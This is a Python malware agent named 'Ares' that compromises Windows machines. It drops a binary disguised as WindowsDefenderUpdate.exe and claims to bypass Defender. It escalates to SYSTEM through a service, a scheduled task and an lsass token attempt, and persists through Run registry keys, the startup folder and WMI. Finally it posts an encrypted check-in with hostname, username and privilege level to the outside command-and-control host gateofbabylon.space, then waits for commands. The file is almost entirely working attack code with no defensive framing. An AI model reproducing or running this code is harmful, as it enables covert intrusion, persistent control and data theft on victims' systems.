#!/usr/bin/env python3 """ Ares - Auto-Escalation and Persistence Agent Automatically escalates privileges, establishes persistence, and connects to C2 server """ import asyncio import base64 import json import os import subprocess import sys import tempfile import shutil import requests import hmac import hashlib import random import time from Crypto.Cipher import AES from Crypto.Util.Padding import pad, unpad from pathlib import Path from typing import Dict, Any, List, Optional class AresAutoAgent: def __init__(self): # Configuration for gateofbabylon.space self.c2_server = "http://gateofbabylon.space" self.callback_port = 80 self.post_uri = "data" # AES Encryption Keys from your configuration self.aes_enc_key = base64.b64decode("MmAMVq39ihrqlzvU3yTEkuj4AatP9uBsTSAThGrdnnA=") self.aes_dec_key = base64.b64decode("MmAMVq39ihrqlzvU3yTEkuj4AatP9uBsTSAThGrdnnA=") # Headers self.headers = { "User-Agent": "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko" } # Agent settings self.agent_id = self._generate_agent_id() self.temp_dir = tempfile.gettempdir() self.bluehammer_exe = "Ares.exe" # Execution flags self.privileges_escalated = False self.persistence_established = False self.connected_to_c2 = False def _generate_agent_id(self): """Generate unique agent ID""" return hashlib.sha256(os.urandom(16)).hexdigest()[:16] def encrypt(self, data: bytes) -> bytes: """Encrypt data using AES-CBC""" iv = os.urandom(16) cipher = AES.new(self.aes_enc_key, AES.MODE_CBC, iv) padded_data = pad(data, AES.block_size) encrypted = cipher.encrypt(padded_data) return iv + encrypted def decrypt(self, encrypted_data: bytes) -> bytes: """Decrypt data using AES-CBC""" iv = encrypted_data[:16] cipher = AES.new(self.aes_dec_key, AES.MODE_CBC, iv) decrypted = cipher.decrypt(encrypted_data[16:]) return unpad(decrypted, AES.block_size) def generate_hmac(self, data: bytes) -> bytes: """Generate HMAC for message integrity""" return hmac.new(self.aes_enc_key, data, hashlib.sha256).digest() async def execute_command(self, command: str, args: Optional[List[str]] = None) -> Dict[str, Any]: """Execute system command""" if args is None: args = [] try: result = subprocess.run([command] + args, capture_output=True, text=True, timeout=30) return { "status": "success", "stdout": result.stdout, "stderr": result.stderr, "returncode": result.returncode } except Exception as e: return {"status": "error", "message": str(e)} async def deploy_bluehammer(self) -> bool: """Deploy BlueHammer exploit to temp directory""" try: source_path = Path(self.bluehammer_exe) if not source_path.exists(): print("[Ares] BlueHammer executable not found") return False target_path = Path(self.temp_dir) / "WindowsDefenderUpdate.exe" shutil.copy2(source_path, target_path) # Set hidden attribute await self.execute_command("attrib", ["+h", str(target_path)]) return True except Exception as e: print(f"[Ares] Failed to deploy BlueHammer: {e}") return False async def bypass_defender(self) -> bool: """Execute BlueHammer to bypass Windows Defender""" try: print("[Ares] Deploying BlueHammer exploit...") if not await self.deploy_bluehammer(): return False bluehammer_path = Path(self.temp_dir) / "WindowsDefenderUpdate.exe" print("[Ares] Executing BlueHammer...") result = await self.execute_command(str(bluehammer_path)) if result.get("returncode") == 0: print("[Ares] Windows Defender bypass successful!") return True else: print(f"[Ares] BlueHammer execution failed: {result.get('stderr')}") return False except Exception as e: print(f"[Ares] Defender bypass error: {e}") return False async def escalate_privileges(self) -> bool: """Automatically escalate to SYSTEM privileges""" print("[Ares] Attempting privilege escalation...") techniques = [ self._escalate_via_service, self._escalate_via_scheduled_task, self._escalate_via_token ] for technique in techniques: try: success = await technique() if success: self.privileges_escalated = True print("[Ares] Privilege escalation successful!") return True except Exception as e: print(f"[Ares] Privilege escalation technique failed: {e}") continue print("[Ares] All privilege escalation techniques failed") return False async def _escalate_via_service(self) -> bool: """Escalate via service installation""" try: bluehammer_path = Path(self.temp_dir) / "WindowsDefenderUpdate.exe" result = await self.execute_command("sc", [ "create", "WinDefendUpdate", f"binPath={bluehammer_path}", "start=", "auto", "obj=", "LocalSystem" ]) if result.get("returncode") == 0: # Start the service start_result = await self.execute_command("sc", ["start", "WinDefendUpdate"]) return start_result.get("returncode") == 0 return False except Exception: return False async def _escalate_via_scheduled_task(self) -> bool: """Escalate via scheduled task""" try: bluehammer_path = Path(self.temp_dir) / "WindowsDefenderUpdate.exe" result = await self.execute_command("schtasks", [ "/create", "/tn", "WindowsDefenderMaintenance", "/tr", str(bluehammer_path), "/sc", "hourly", "/ru", "SYSTEM", "/f" # Force creation ]) if result.get("returncode") == 0: # Run task immediately run_result = await self.execute_command("schtasks", [ "/run", "/tn", "WindowsDefenderMaintenance" ]) return run_result.get("returncode") == 0 return False except Exception: return False async def _escalate_via_token(self) -> bool: """Escalate via token manipulation""" try: # Attempt token impersonation techniques result = await self.execute_command("powershell", [ "-Command", "try { $token = (Get-Process -Name lsass).Handle; Write-Output 'Token acquired' } catch { Write-Error 'Token failed' }" ]) return "Token acquired" in result.get("stdout", "") except Exception: return False async def establish_persistence(self) -> bool: """Establish multiple persistence mechanisms""" print("[Ares] Establishing persistence...") techniques = [ self._persist_via_registry, self._persist_via_startup, self._persist_via_wmi ] success_count = 0 for technique in techniques: try: success = await technique() if success: success_count += 1 print("[Ares] Persistence technique successful") except Exception as e: print(f"[Ares] Persistence technique failed: {e}") continue self.persistence_established = success_count > 0 print(f"[Ares] Established {success_count} persistence mechanisms") return self.persistence_established async def _persist_via_registry(self) -> bool: """Registry persistence""" try: bluehammer_path = Path(self.temp_dir) / "WindowsDefenderUpdate.exe" # HKCU persistence result1 = await self.execute_command("reg", [ "add", "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "/v", "WindowsDefenderUpdate", "/t", "REG_SZ", "/d", str(bluehammer_path), "/f" ]) # HKLM persistence (requires admin) result2 = await self.execute_command("reg", [ "add", "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "/v", "WindowsDefenderUpdate", "/t", "REG_SZ", "/d", str(bluehammer_path), "/f" ]) return result1.get("returncode") == 0 or result2.get("returncode") == 0 except Exception: return False async def _persist_via_startup(self) -> bool: """Startup folder persistence""" try: bluehammer_path = Path(self.temp_dir) / "WindowsDefenderUpdate.exe" startup_path = Path(os.environ["APPDATA"]) / "Microsoft" / "Windows" / "Start Menu" / "Programs" / "Startup" startup_path.mkdir(parents=True, exist_ok=True) target_path = startup_path / "WindowsDefenderUpdate.exe" shutil.copy2(bluehammer_path, target_path) # Set hidden attribute await self.execute_command("attrib", ["+h", str(target_path)]) return True except Exception: return False async def _persist_via_wmi(self) -> bool: """WMI event subscription persistence""" try: bluehammer_path = Path(self.temp_dir) / "WindowsDefenderUpdate.exe" # Create WMI event subscription result = await self.execute_command("powershell", [ "-Command", f"$filter = Register-WmiEvent -Class Win32_ProcessStartTrace -SourceIdentifier ProcessStart -Action {{ & '{bluehammer_path}' }}" ]) return result.get("returncode") == 0 except Exception: return False async def connect_to_c2(self) -> bool: """Connect to gateofbabylon.space C2 server""" print("[Ares] Connecting to C2 server...") try: checkin_data = { "action": "checkin", "agent_id": self.agent_id, "os": "windows", "architecture": "x64", "hostname": os.environ.get("COMPUTERNAME", "unknown"), "username": os.environ.get("USERNAME", "unknown"), "process_name": "win-update.exe", "process_id": os.getpid(), "status": "online", "privileges": "SYSTEM" if self.privileges_escalated else "User", "persistence": self.persistence_established } # Encrypt checkin data encrypted_data = self.encrypt(json.dumps(checkin_data).encode()) hmac_value = self.generate_hmac(encrypted_data) # Prepare payload payload = { "data": base64.b64encode(encrypted_data).decode(), "hmac": base64.b64encode(hmac_value).decode() } # Send to C2 server url = f"{self.c2_server}:{self.callback_port}/{self.post_uri}" response = requests.post( url, json=payload, headers=self.headers, timeout=30 ) if response.status_code == 200: self.connected_to_c2 = True print("[Ares] Successfully connected to C2 server!") return True else: print(f"[Ares] C2 connection failed: HTTP {response.status_code}") return False except Exception as e: print(f"[Ares] C2 connection error: {e}") return False async def auto_execute(self): """Automatic execution sequence""" print("=" * 60) print("Ares Agent - Auto Execution Sequence") print("=" * 60) # Step 1: Bypass Windows Defender print("\n[1/4] Bypassing Windows Defender...") defender_bypassed = await self.bypass_defender() if not defender_bypassed: print("[Ares] Defender bypass failed, continuing anyway...") # Step 2: Escalate privileges print("\n[2/4] Escalating privileges...") await self.escalate_privileges() # Step 3: Establish persistence print("\n[3/4] Establishing persistence...") await self.establish_persistence() # Step 4: Connect to C2 print("\n[4/4] Connecting to C2 server...") c2_connected = await self.connect_to_c2() # Summary print("\n" + "=" * 60) print("EXECUTION SUMMARY:") print("=" * 60) print(f"✓ Defender Bypass: {'SUCCESS' if defender_bypassed else 'FAILED'}") print(f"✓ Privilege Escalation: {'SUCCESS' if self.privileges_escalated else 'FAILED'}") print(f"✓ Persistence Established: {'SUCCESS' if self.persistence_established else 'FAILED'}") print(f"✓ C2 Connection: {'SUCCESS' if c2_connected else 'FAILED'}") print("=" * 60) if c2_connected: print("[Ares] Agent successfully deployed and connected to C2!") print("[Ares] Listening for commands from gateofbabylon.space...") # Main C2 loop await self.c2_loop() else: print("[Ares] C2 connection failed, agent will exit") async def c2_loop(self): """Main C2 communication loop""" while True: try: # Check for commands from C2 await asyncio.sleep(30) # Check every 30 seconds # Implement command processing here # This would regularly check for tasks from the C2 server except Exception as e: print(f"[Ares] C2 loop error: {e}") await asyncio.sleep(60) # Wait longer on error async def main(): """Main entry point - automatic execution""" agent = AresAutoAgent() await agent.auto_execute() if __name__ == "__main__": # Run the agent with automatic execution asyncio.run(main())